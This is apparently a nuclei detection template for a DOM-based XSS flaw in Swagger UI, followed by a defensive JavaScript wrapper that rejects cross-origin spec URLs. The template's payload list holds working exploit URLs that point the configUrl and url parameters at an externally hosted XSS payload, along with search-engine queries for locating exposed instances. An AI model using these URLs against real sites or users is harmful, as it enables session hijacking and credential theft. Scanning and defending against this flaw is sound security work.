id: CVE-2025-8191

info:
  name: Swagger UI >=3.14.1 < 3.38.0 - DOM Based Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS).
    The vulnerability is triggered when Swagger UI loads a specification or configuration from an
    attacker-supplied location whose contents carry an XSS payload. An attacker can craft a malicious
    configUrl (or url) query parameter that, when processed by Swagger UI, executes arbitrary
    JavaScript in the victim's browser within the origin of the Swagger UI page.
  impact: |
    Attackers can craft malicious configUrl or url parameters for a Swagger UI page that execute
    arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential
    theft, or account takeover when users open the attacker-supplied link to the documentation.
  remediation: |
    Upgrade Swagger UI to version 3.38.0 or later, which properly sanitizes and validates
    configuration URLs.
  reference:
    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8191
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-8191
    cwe-id: CWE-79
    epss-score: 0.00678
    epss-percentile: 0.71896
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartbear
    product: swagger_ui
    shodan-query:
      - http.component:"Swagger"
      - http.component:"swagger"
      - http.favicon.hash:"-1180440057"
    fofa-query: icon_hash="-1180440057"
    zoomeye-query: app:"Swagger UI"
  tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss,vuln

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/{{swagger_path}}'
        action: navigate

      # The payload spec triggers a JavaScript dialog; the template treats that dialog
      # as proof of script execution in the page's origin.
      - action: waitdialog
        name: swagger_dom

    payloads:
      swagger_path:
        - 'swagger/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'api-docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'open-api/swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - swagger_dom == true

      - type: word
        part: body
        words:
          - "swagger"
        case-insensitive: true
# digest: 490a004630440220558bbc61eb1d34bd857760542df744f9cee44bfc77a2ba3506491cfbe769357b02203d2f4399ef75c967e5460bcf74530241be01fc137cbd8b17a1060836e39eac10:922c64590222798bb761d5b6d8e72950
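The template above proves the bug by pointing `configUrl` / `url` at a spec hosted on a foreign origin. The following is an added example, not code from Swagger UI or from the nuclei template: a defence-in-depth wrapper that a deployer can put in front of `SwaggerUIBundle()` so the page only honours spec locations on its own origin (or an explicit host allowlist) and otherwise falls back to a fixed default. The names `DEFAULT_SPEC`, `classifySpecUrl`, `resolveSpecUrl`, `initSwaggerUi` and the host `api.example.com` are this example's own assumptions.

```javascript
// Added example (not Swagger UI or nuclei-templates code).
// Swagger UI reads `url` and `configUrl` from location.search; the vulnerable
// pattern is to hand those values straight to SwaggerUIBundle(), so a spec or
// config fetched from an attacker's host is rendered inside the victim's origin.
// This wrapper decides, before initialisation, whether the requested location is
// trustworthy, and uses a fixed default otherwise.

const DEFAULT_SPEC = '/v3/api-docs';   // assumed default spec path for this deployment

// Classifies one candidate spec location relative to the page origin.
// Returns one of: 'missing', 'unparsable', 'bad-scheme', 'same-origin',
// 'allowlisted', 'cross-origin'.
function classifySpecUrl(candidate, pageOrigin, allowedHosts = []) {
  if (!candidate) return 'missing';
  let target;
  try {
    // Resolve against the page origin so "/x", "../x" and "//evil.example/x"
    // are judged on where they actually resolve to, not on how they look.
    target = new URL(candidate, pageOrigin);
  } catch {
    return 'unparsable';                 // e.g. "http://" with no host
  }
  // Only plain web schemes; this rejects javascript:, data:, blob: and friends.
  if (target.protocol !== 'https:' && target.protocol !== 'http:') return 'bad-scheme';
  if (target.origin === pageOrigin) return 'same-origin';
  if (allowedHosts.includes(target.host)) return 'allowlisted';
  return 'cross-origin';
}

// Picks the spec URL Swagger UI should load for a given query string.
// Both parameters the scanner abuses are checked; anything not same-origin or
// allowlisted collapses to DEFAULT_SPEC.
function resolveSpecUrl(search, pageOrigin, allowedHosts = []) {
  const params = new URLSearchParams(search);
  const candidate = params.get('configUrl') || params.get('url');
  const verdict = classifySpecUrl(candidate, pageOrigin, allowedHosts);
  if (verdict === 'same-origin' || verdict === 'allowlisted') {
    return new URL(candidate, pageOrigin).href;
  }
  return DEFAULT_SPEC;
}

// How a page would wire this in. Guarded so the file also loads under Node.
function initSwaggerUi(allowedHosts = []) {
  const specUrl = resolveSpecUrl(window.location.search, window.location.origin, allowedHosts);
  if (typeof SwaggerUIBundle !== 'undefined') {
    SwaggerUIBundle({ url: specUrl, dom_id: '#swagger-ui' });
  }
  return specUrl;
}

if (typeof window !== 'undefined') {
  initSwaggerUi();
}
```

This only closes the attacker-controlled-location vector that the template exercises; it does not repair the rendering flaw inside Swagger UI, so a spec hosted on the same origin (or an allowlisted host) that contains the payload would still fire. Upgrading to 3.38.0 or later, as the remediation says, remains the actual fix; the wrapper is a stop-gap and a sensible default even after upgrading.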